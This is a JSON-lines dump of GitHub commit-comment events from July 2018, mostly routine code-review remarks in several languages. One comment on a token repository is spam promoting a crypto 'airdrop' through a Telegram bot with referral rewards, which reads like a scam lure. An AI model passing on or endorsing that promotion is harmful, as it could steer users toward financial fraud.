{"id":"8037289235","type":"CommitCommentEvent","actor":{"login":"simonbasle"},"repo":{"name":"lettuce-io/lettuce-core"},"payload":{"comment":{"id":29885774,"position":237,"line":380,"path":"src/main/java/io/lettuce/core/ScanStream.java","commit_id":"7742f8f3b2dabef1f67ba1cff66461d2f704f8d8","created_at":"2018-07-30T12:08:26Z","updated_at":"2018-07-30T12:08:26Z","author_association":"NONE","body":"as `this.terminated` can be set by both the `onError` and `onDemande` (effectively on `request`) paths, you might want to use an `AtomicBooleanFieldUpdater TERMINATED` and call `TERMINATED.compareAndSet(this, false, true)` here and in onDemand to ensure no race between `sink.complete` and `sink.error`."}},"created_at":"2018-07-30T12:08:26Z"}
{"id":"8037291415","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"Foliotek/Croppie"},"payload":{"comment":{"id":29885785,"position":null,"line":null,"path":null,"commit_id":"e15877101624da79032a6717d16b9529f948fc05","created_at":"2018-07-30T12:08:56Z","updated_at":"2018-07-30T12:08:56Z","author_association":"NONE","body":"Note: Unfortunately that's a bad way to check for initialization. In my codebase, the container element was labelled with the class `croppie-container-element`. Now I cannot initialize croppie at all, since `croppie-container` is a substring of the complete class name."}},"created_at":"2018-07-30T12:08:56Z"}
{"id":"8037292061","type":"CommitCommentEvent","actor":{"login":"Lipnevich"},"repo":{"name":"Lipnevich/noxbox"},"payload":{"comment":{"id":29885786,"position":80,"line":119,"path":"app/src/main/java/by/nicolay/lipnevich/noxbox/detailed/DetailedNoxboxPage.java","commit_id":"d166a25d69c92aa6f34f72736f5d847376bccc51","created_at":"2018-07-30T12:09:04Z","updated_at":"2018-07-30T12:09:04Z","author_association":"OWNER","body":"Время для себя мы сохраняем в формате 24 часовом, но показывать пользователю нужно в формате для его настроек локали 3 pm или 15 : 00"}},"created_at":"2018-07-30T12:09:04Z"}
{"id":"8037293970","type":"CommitCommentEvent","actor":{"login":"Belrestro"},"repo":{"name":"mfahlandt/node-xml-stream-parser"},"payload":{"comment":{"id":29885794,"position":null,"line":null,"path":null,"commit_id":"395de35c1ca79cab83ff5e5e58a4d01c13931435","created_at":"2018-07-30T12:09:31Z","updated_at":"2018-07-30T12:09:31Z","author_association":"NONE","body":"This is actually one good fix, very very useful !"}},"created_at":"2018-07-30T12:09:31Z"}
{"id":"8037295468","type":"CommitCommentEvent","actor":{"login":"cocoitali"},"repo":{"name":"cocoitali/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29885798,"position":null,"line":null,"path":null,"commit_id":"8d08d4dffc2e5a8e6ccb861e0270e04a8d75b86b","created_at":"2018-07-30T12:09:50Z","updated_at":"2018-07-30T12:09:50Z","author_association":"OWNER","body":"Put final touches on the about page, and finished to my liking."}},"created_at":"2018-07-30T12:09:50Z"}
{"id":"8037295987","type":"CommitCommentEvent","actor":{"login":"Lipnevich"},"repo":{"name":"Lipnevich/noxbox"},"payload":{"comment":{"id":29885801,"position":90,"line":127,"path":"app/src/main/java/by/nicolay/lipnevich/noxbox/detailed/DetailedNoxboxPage.java","commit_id":"d166a25d69c92aa6f34f72736f5d847376bccc51","created_at":"2018-07-30T12:09:57Z","updated_at":"2018-07-30T12:09:57Z","author_association":"OWNER","body":"Статичные, неизменные картинки лучше записывать в xml"}},"created_at":"2018-07-30T12:09:57Z"}
{"id":"8037299710","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885810,"position":2,"line":2,"path":"pages/check/index/list.vue","commit_id":"71e52efe480bc913de77250e2e0bc24577e9131d","created_at":"2018-07-30T12:10:48Z","updated_at":"2018-07-30T12:10:48Z","author_association":"NONE","body":"建议\r\n直接使用class即可，没必要用变量"}},"created_at":"2018-07-30T12:10:48Z"}
{"id":"8037300339","type":"CommitCommentEvent","actor":{"login":"LinnoBraz"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29885811,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T12:10:56Z","updated_at":"2018-07-30T12:10:56Z","author_association":"NONE","body":"New Airdrop: Harambee Token!!Leveraging on the blockchain technology, Land\nLayBy is building a trusted shared distributed ledger for recording land\nbuying and selling transactions that can never be altered, corrupted,\nforged or replicated in error. Chat with the telegram bot and get 100 HRBE\n($70) and get 150 HRBE ($105) for every referral.\nhttp://t.me/HrbeAirDropBot?start=530942131\n\nEm seg, 30 de jul de 2018 09:09, TimCool72 <notifications@github.com>\nescreveu:\n\n> Great project!!\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29885773>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnrUO_eXyxLWCqqdHA_GkBQONHZZ5uJ0ks5uLvdggaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-30T12:10:56Z"}
{"id":"8037300765","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29885812,"position":null,"line":null,"path":null,"commit_id":"176353941e13e05148c2078bde1249f0d70cae1f","created_at":"2018-07-30T12:11:04Z","updated_at":"2018-07-30T12:11:04Z","author_association":"NONE","body":"test commit"}},"created_at":"2018-07-30T12:11:04Z"}
{"id":"8037301410","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885814,"position":24,"line":24,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:11:13Z","updated_at":"2018-07-30T12:11:13Z","author_association":"NONE","body":"Тут у нас станция начинает знать слишком много о деталях реализации класса поезд. Эта логика должна уйти в класс поезд. Задача станции - просто принять поезд, который к ней пришел (то есть добавить его в массив `@trains`)"}},"created_at":"2018-07-30T12:11:13Z"}
{"id":"8037307403","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885824,"position":27,"line":27,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:12:29Z","updated_at":"2018-07-30T12:12:29Z","author_association":"NONE","body":"Это единственная строка, которая должна быть в теле этого метода."}},"created_at":"2018-07-30T12:12:29Z"}
{"id":"8037308721","type":"CommitCommentEvent","actor":{"login":"hneemann"},"repo":{"name":"hneemann/Digital"},"payload":{"comment":{"id":29885825,"position":null,"line":null,"path":null,"commit_id":"70eda1fcc20869feaca072c3c2742a596d55902b","created_at":"2018-07-30T12:12:47Z","updated_at":"2018-07-30T12:12:47Z","author_association":"OWNER","body":"You're welcome! :-)"}},"created_at":"2018-07-30T12:12:47Z"}
{"id":"8037308808","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29885827,"position":null,"line":null,"path":null,"commit_id":"176353941e13e05148c2078bde1249f0d70cae1f","created_at":"2018-07-30T12:12:47Z","updated_at":"2018-07-30T12:12:47Z","author_association":"NONE","body":"test commit 12"}},"created_at":"2018-07-30T12:12:47Z"}
{"id":"8037308910","type":"CommitCommentEvent","actor":{"login":"deciduously"},"repo":{"name":"deciduously/mifkad"},"payload":{"comment":{"id":29885828,"position":null,"line":null,"path":null,"commit_id":"4b9a32bdbb479ca44bae98625529546eb81cdc3f","created_at":"2018-07-30T12:12:49Z","updated_at":"2018-07-30T12:12:49Z","author_association":"OWNER","body":"Find a way to pass the specific kid to toggle up through that onClick chain"}},"created_at":"2018-07-30T12:12:49Z"}
{"id":"8037309719","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885831,"position":35,"line":35,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:13:00Z","updated_at":"2018-07-30T12:13:00Z","author_association":"NONE","body":"Вот тут все верно"}},"created_at":"2018-07-30T12:13:00Z"}
{"id":"8037309997","type":"CommitCommentEvent","actor":{"login":"brunelli"},"repo":{"name":"erickpires/minervaboto"},"payload":{"comment":{"id":29885833,"position":null,"line":null,"path":null,"commit_id":"57b99df164724fbc8be0e3ee9bec146111a2de10","created_at":"2018-07-30T12:13:04Z","updated_at":"2018-07-30T12:13:04Z","author_association":"COLLABORATOR","body":"I think it's okay, as long as we still return the dict from `get_return_dict`. From then on it's up to the client to present or note a detailed error message to the user. "}},"created_at":"2018-07-30T12:13:04Z"}
{"id":"8037321254","type":"CommitCommentEvent","actor":{"login":"Shazwazza"},"repo":{"name":"umbraco/Umbraco-CMS"},"payload":{"comment":{"id":29885846,"position":6,"line":18,"path":"src/Umbraco.Core/Persistence/Migrations/Upgrades/TargetVersionSevenTwelveZero/IncreaseLanguageIsoCodeColumnLength.cs","commit_id":"f11c71599b7f3589f68efefb9df1cb38750c6a14","created_at":"2018-07-30T12:15:28Z","updated_at":"2018-07-30T12:15:28Z","author_association":"MEMBER","body":"@clausjensen this isn't mysql compatible and should be done with a normal migration to drop the index, not in an Execute.Code block. I'll update in v8 and we'll have to backport to v7"}},"created_at":"2018-07-30T12:15:28Z"}
{"id":"8037322838","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885848,"position":39,"line":39,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:15:49Z","updated_at":"2018-07-30T12:15:49Z","author_association":"NONE","body":"Согласен, что из задания не совсем понятно, возвращать, или просто выводить кол-во. Мы принимаем оба варианта. Тут нам важно, что-б вы научились делать выборку объектов по атрибутам. Выбирать, или считать их - нам не принципиально."}},"created_at":"2018-07-30T12:15:49Z"}
{"id":"8037326226","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29885852,"position":1,"line":1,"path":"edu_server/server/views.py","commit_id":"8ff20bd6be2c554c4c8f3fcd63a09ab0d7df9e5f","created_at":"2018-07-30T12:16:31Z","updated_at":"2018-07-30T12:16:31Z","author_association":"COLLABORATOR","body":"Unused import"}},"created_at":"2018-07-30T12:16:31Z"}
{"id":"8037328327","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885861,"position":null,"line":null,"path":null,"commit_id":"6fa32b3825cc116bbd6d5d97b87c3f0ad0141787","created_at":"2018-07-30T12:16:59Z","updated_at":"2018-07-30T12:16:59Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:16:59Z"}
{"id":"8037329473","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29885862,"position":3,"line":3,"path":"edu_server/server/views.py","commit_id":"18e71d4fb54b53166fbb546370e7ba6021b7efc6","created_at":"2018-07-30T12:17:14Z","updated_at":"2018-07-30T12:17:14Z","author_association":"COLLABORATOR","body":"Unused import"}},"created_at":"2018-07-30T12:17:14Z"}
{"id":"8037329525","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885864,"position":null,"line":null,"path":null,"commit_id":"ff4b0eb30fb9803fed46ac0ba1e2f509f9040567","created_at":"2018-07-30T12:17:15Z","updated_at":"2018-07-30T12:17:15Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:17:15Z"}
{"id":"8037331171","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885866,"position":null,"line":null,"path":null,"commit_id":"b7b9339d541128c962f8eaf7b63ce08a5db123de","created_at":"2018-07-30T12:17:35Z","updated_at":"2018-07-30T12:17:35Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:17:35Z"}
{"id":"8037332394","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885870,"position":null,"line":null,"path":null,"commit_id":"9b294bc9d3e5b4af4bb5e8a2fcf26baa39fdc9ef","created_at":"2018-07-30T12:17:50Z","updated_at":"2018-07-30T12:17:50Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:17:50Z"}
{"id":"8037333154","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29885871,"position":7,"line":23,"path":"edu_server/server/views.py","commit_id":"64c01bbe55e4cbaa622179dc293447dd78b98cff","created_at":"2018-07-30T12:18:00Z","updated_at":"2018-07-30T12:18:00Z","author_association":"COLLABORATOR","body":"course_id parameter is unused"}},"created_at":"2018-07-30T12:18:00Z"}
{"id":"8037333635","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885872,"position":null,"line":null,"path":null,"commit_id":"1949d73f7f3bed45fe58caa6b48df428b59b9105","created_at":"2018-07-30T12:18:06Z","updated_at":"2018-07-30T12:18:06Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:18:06Z"}
{"id":"8037334860","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885875,"position":null,"line":null,"path":null,"commit_id":"16ef6f0e4e76f50cf58978d58781e1056cfb4ad3","created_at":"2018-07-30T12:18:21Z","updated_at":"2018-07-30T12:18:21Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:18:21Z"}
{"id":"8037336082","type":"CommitCommentEvent","actor":{"login":"Mygod"},"repo":{"name":"shadowsocks/shadowsocks-libev"},"payload":{"comment":{"id":29885888,"position":31,"line":721,"path":"src/local.c","commit_id":"b918fd7a7772efe7d4cad3bbcb388f112140bd91","created_at":"2018-07-30T12:18:37Z","updated_at":"2018-07-30T12:18:37Z","author_association":"NONE","body":"Seems like this change could cause `ip` to be possibly undefined on Android."}},"created_at":"2018-07-30T12:18:37Z"}
{"id":"8037337545","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885894,"position":null,"line":null,"path":null,"commit_id":"183cc5e2d77400e80453c3a78c97019856059242","created_at":"2018-07-30T12:18:55Z","updated_at":"2018-07-30T12:18:55Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:18:55Z"}
{"id":"8037337908","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885895,"position":40,"line":40,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:19:00Z","updated_at":"2018-07-30T12:19:00Z","author_association":"NONE","body":"Проще сделать можно дав этому-методу аргумент с типом, который нужно считать/выводить. И все, что остается сделать после этого в теле метода - это найти из коллекции `@trains` те поезда, тип которых будет соответствовать типу переданному в аргументе. Для этого подойдут методы select/count на выбор"}},"created_at":"2018-07-30T12:19:00Z"}
{"id":"8037338640","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885898,"position":null,"line":null,"path":null,"commit_id":"48c91590e4b54d94d5448b001f1987c39f3e9024","created_at":"2018-07-30T12:19:10Z","updated_at":"2018-07-30T12:19:10Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:19:10Z"}
{"id":"8037339224","type":"CommitCommentEvent","actor":{"login":"danielarnason"},"repo":{"name":"regiongis/python_helpers"},"payload":{"comment":{"id":29885900,"position":null,"line":null,"path":null,"commit_id":"7e41d135180e1eb9047b67ec21b9738d12664653","created_at":"2018-07-30T12:19:17Z","updated_at":"2018-07-30T12:19:17Z","author_association":"CONTRIBUTOR","body":"Ah, ok! \r\n\r\nJeg har også lagt mærke til, at WKT geometrien bliver ødelagt, hvis man åbner en geometry kolonne i pandas. Her skal vi nok bruge geopandas."}},"created_at":"2018-07-30T12:19:17Z"}
{"id":"8037340333","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885905,"position":null,"line":null,"path":null,"commit_id":"9b5a0f1b89b13c5d01da5f457b31a8c9f8b8ac8f","created_at":"2018-07-30T12:19:30Z","updated_at":"2018-07-30T12:19:30Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:19:30Z"}
{"id":"8037341734","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885911,"position":null,"line":null,"path":null,"commit_id":"7266f6009e646cbe4f38e28e1ee72ad96c70eea8","created_at":"2018-07-30T12:19:49Z","updated_at":"2018-07-30T12:19:49Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:19:49Z"}
{"id":"8037343223","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885914,"position":null,"line":null,"path":null,"commit_id":"f89e7e200e3c7f694511f99ad7c8955b8aa15e87","created_at":"2018-07-30T12:20:08Z","updated_at":"2018-07-30T12:20:08Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:20:08Z"}
{"id":"8037344542","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885915,"position":null,"line":null,"path":null,"commit_id":"8c473f20674b4e7fba40ae28289fcdbdc7a98674","created_at":"2018-07-30T12:20:23Z","updated_at":"2018-07-30T12:20:23Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:20:23Z"}
{"id":"8037344767","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29885917,"position":null,"line":null,"path":null,"commit_id":"90db22563f01bb2b9de6c05865ad71dbb1a2684d","created_at":"2018-07-30T12:20:26Z","updated_at":"2018-07-30T12:20:26Z","author_association":"COLLABORATOR","body":"CourseManager class is too big. Let's separate it into 2 classes. One responsible for GET requests, another one -- for POST"}},"created_at":"2018-07-30T12:20:26Z"}
{"id":"8037345834","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29885918,"position":null,"line":null,"path":null,"commit_id":"2e05f20261d12d5bc72334279171a5cb18f0962e","created_at":"2018-07-30T12:20:39Z","updated_at":"2018-07-30T12:20:39Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[3] Testování](https://trello.com/c/IKaqBmei/70-3-testov%C3%A1n%C3%AD)"}},"created_at":"2018-07-30T12:20:39Z"}
{"id":"8037348347","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29885924,"position":44,"line":44,"path":"e_16/src/e_16_4/e_16_4.java","commit_id":"ee2d9181510c13097033e8a770ed245e6cf0b1d9","created_at":"2018-07-30T12:21:10Z","updated_at":"2018-07-30T12:21:10Z","author_association":"COLLABORATOR","body":"成田\r\n問題文にreverseに対する空参照とあるので、87行目のreverseの引数にnullを渡すのが問題の意図かと思われます。\r\n前問のような範囲外のreverseとnull指定のreverseを呼び出す形でいいのではないかと思います。"}},"created_at":"2018-07-30T12:21:10Z"}
{"id":"8037349415","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29885927,"position":20,"line":42,"path":"edu_server/server/models.py","commit_id":"90db22563f01bb2b9de6c05865ad71dbb1a2684d","created_at":"2018-07-30T12:21:23Z","updated_at":"2018-07-30T12:21:23Z","author_association":"COLLABORATOR","body":"f, s and t are not good names for the variables."}},"created_at":"2018-07-30T12:21:23Z"}
{"id":"8037350914","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885931,"position":52,"line":52,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:21:42Z","updated_at":"2018-07-30T12:21:42Z","author_association":"NONE","body":"Вот, это идеальное решение для предыдущего метода"}},"created_at":"2018-07-30T12:21:42Z"}
{"id":"8037351253","type":"CommitCommentEvent","actor":{"login":"goranx26"},"repo":{"name":"goranx26/IPTest"},"payload":{"comment":{"id":29885935,"position":null,"line":null,"path":null,"commit_id":"a081b6e927dd3dd3c682a41aa77241b59dda9581","created_at":"2018-07-30T12:21:46Z","updated_at":"2018-07-30T12:21:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [TODO](https://trello.com/c/ldjJKoXm/29-todo)"}},"created_at":"2018-07-30T12:21:46Z"}
{"id":"8037354795","type":"CommitCommentEvent","actor":{"login":"buizzerd"},"repo":{"name":"buizzerd/azure-ansible"},"payload":{"comment":{"id":29885944,"position":null,"line":null,"path":null,"commit_id":"110b33bcdc8431f194f523bd9aae8f4ebcd667fa","created_at":"2018-07-30T12:22:29Z","updated_at":"2018-07-30T12:22:29Z","author_association":"OWNER","body":"Revery"}},"created_at":"2018-07-30T12:22:29Z"}
{"id":"8037355974","type":"CommitCommentEvent","actor":{"login":"ktisha"},"repo":{"name":"phoenix-asv/edu-server"},"payload":{"comment":{"id":29885949,"position":106,"line":93,"path":"edu_server/server/models.py","commit_id":"c1fbd9613a9f363d753eb6e334cf50480bd132c9","created_at":"2018-07-30T12:22:44Z","updated_at":"2018-07-30T12:22:44Z","author_association":"COLLABORATOR","body":"Let's describe somewhere version format you're parsing here. Otherwise it's just black magic"}},"created_at":"2018-07-30T12:22:44Z"}
{"id":"8037360686","type":"CommitCommentEvent","actor":{"login":"buizzerd"},"repo":{"name":"buizzerd/azure-ansible"},"payload":{"comment":{"id":29885957,"position":null,"line":null,"path":null,"commit_id":"a882ce72e15382167adaad0cccff887e88af25f2","created_at":"2018-07-30T12:23:42Z","updated_at":"2018-07-30T12:23:42Z","author_association":"OWNER","body":"Revert"}},"created_at":"2018-07-30T12:23:42Z"}
{"id":"8037363030","type":"CommitCommentEvent","actor":{"login":"MrPlow254"},"repo":{"name":"opencart/opencart"},"payload":{"comment":{"id":29885961,"position":null,"line":null,"path":null,"commit_id":"f6ab5eab5fe17f941c0830c5f81e93456b8d0c7c","created_at":"2018-07-30T12:24:12Z","updated_at":"2018-07-30T12:24:12Z","author_association":"CONTRIBUTOR","body":"Why not update to 5.2? Font awesome uses backwards compatibility on 5.X versions https://github.com/FortAwesome/Font-Awesome/blob/master/CHANGELOG.md"}},"created_at":"2018-07-30T12:24:12Z"}
{"id":"8037364210","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29885964,"position":null,"line":null,"path":null,"commit_id":"dd1a7acfa86db68612fe4055849af02467b002e2","created_at":"2018-07-30T12:24:27Z","updated_at":"2018-07-30T12:24:27Z","author_association":"COLLABORATOR","body":"Puzzle `1147-60d5b5b4` disappeared from [`src/main/java/com/zerocracy/tk/TkJoin.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/tk/TkJoin.java), that's why I closed #1179. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-30T12:24:27Z"}
{"id":"8037365673","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29885968,"position":null,"line":null,"path":null,"commit_id":"dd1a7acfa86db68612fe4055849af02467b002e2","created_at":"2018-07-30T12:24:46Z","updated_at":"2018-07-30T12:24:46Z","author_association":"COLLABORATOR","body":"Puzzle `1179-61ff2e4f` discovered in   [`src/main/java/com/zerocracy/tk/TkJoin.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/tk/TkJoin.java)   and submitted as #1506. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-30T12:24:46Z"}
{"id":"8037366510","type":"CommitCommentEvent","actor":{"login":"peterdemin"},"repo":{"name":"applegrew/django-select2"},"payload":{"comment":{"id":29885972,"position":24,"line":77,"path":"django_select2/conf.py","commit_id":"1954bf57fafee0f27a7b444b1a468331ac2af9b3","created_at":"2018-07-30T12:24:57Z","updated_at":"2018-07-30T12:24:57Z","author_association":"NONE","body":"I don't think any code changes are necessary. Bump major version and release the master branch as is with `7.0.0`.\r\nThen check out `6.1.0` and re-release it with `6.1.2`.\r\nThis way, everyone who has `~6.1` in the requirements file and `python<3.6` will have a working version,\r\nand everyone with `python>=3.6` can upgrade to `7.0.0+` and have all the new fixes/features.\r\nRemoving releases from pypi is always a bad idea, in all such cases it's better to release the fix with the next version."}},"created_at":"2018-07-30T12:24:57Z"}
{"id":"8037396122","type":"CommitCommentEvent","actor":{"login":"ddtootsuka"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29886064,"position":null,"line":null,"path":null,"commit_id":"b0e19ed29f0539d69b7757c80a3f286a5a7d15aa","created_at":"2018-07-30T12:31:01Z","updated_at":"2018-07-30T12:31:01Z","author_association":"OWNER","body":"E1-1,1-2,1-3\r\n\r\n演習問題を３問実施いたしました。99％\r\n次回TODO：プッシュしたものに修正があれば修正を、なければ次に進みたいと思います。"}},"created_at":"2018-07-30T12:31:01Z"}
{"id":"8037401461","type":"CommitCommentEvent","actor":{"login":"andytruong"},"repo":{"name":"solo-io/gloo"},"payload":{"comment":{"id":29886077,"position":11,"line":11,"path":"docs/tutorials/source_events_from_github/source_events_from_github.md","commit_id":"b3f1dff4b4aa31272f0be5e72ae8426b147dc5c7","created_at":"2018-07-30T12:32:08Z","updated_at":"2018-07-30T12:32:08Z","author_association":"NONE","body":"Can you explain where's the logic that push the event to NATS? I can't see where the logic for `github-webhooks` is implemented. Thanks."}},"created_at":"2018-07-30T12:32:08Z"}
{"id":"8037403933","type":"CommitCommentEvent","actor":{"login":"smanish01"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29886080,"position":null,"line":null,"path":null,"commit_id":"888db5d138ae543b9b64838788bf1af177c4fed1","created_at":"2018-07-30T12:32:36Z","updated_at":"2018-07-30T12:32:36Z","author_association":"OWNER","body":"test pull comment 2"}},"created_at":"2018-07-30T12:32:36Z"}
{"id":"8037406648","type":"CommitCommentEvent","actor":{"login":"coltguo"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29886092,"position":null,"line":null,"path":null,"commit_id":"ab5dc6597ab013c8808d15aba241ebb086ff692b","created_at":"2018-07-30T12:33:10Z","updated_at":"2018-07-30T12:33:10Z","author_association":"CONTRIBUTOR","body":"能不能帮我把SMA在imtoken上括号里面的内容给去掉就显示SMA"}},"created_at":"2018-07-30T12:33:10Z"}
{"id":"8037407925","type":"CommitCommentEvent","actor":{"login":"MoonHou"},"repo":{"name":"MoonHou/MoonHou.github.io"},"payload":{"comment":{"id":29886094,"position":1,"line":1,"path":"cplay /README.md","commit_id":"3efa9a25f8aff5b520598ef43e89133d0bbc89a9","created_at":"2018-07-30T12:33:26Z","updated_at":"2018-07-30T12:33:26Z","author_association":"OWNER","body":"哈哈"}},"created_at":"2018-07-30T12:33:26Z"}
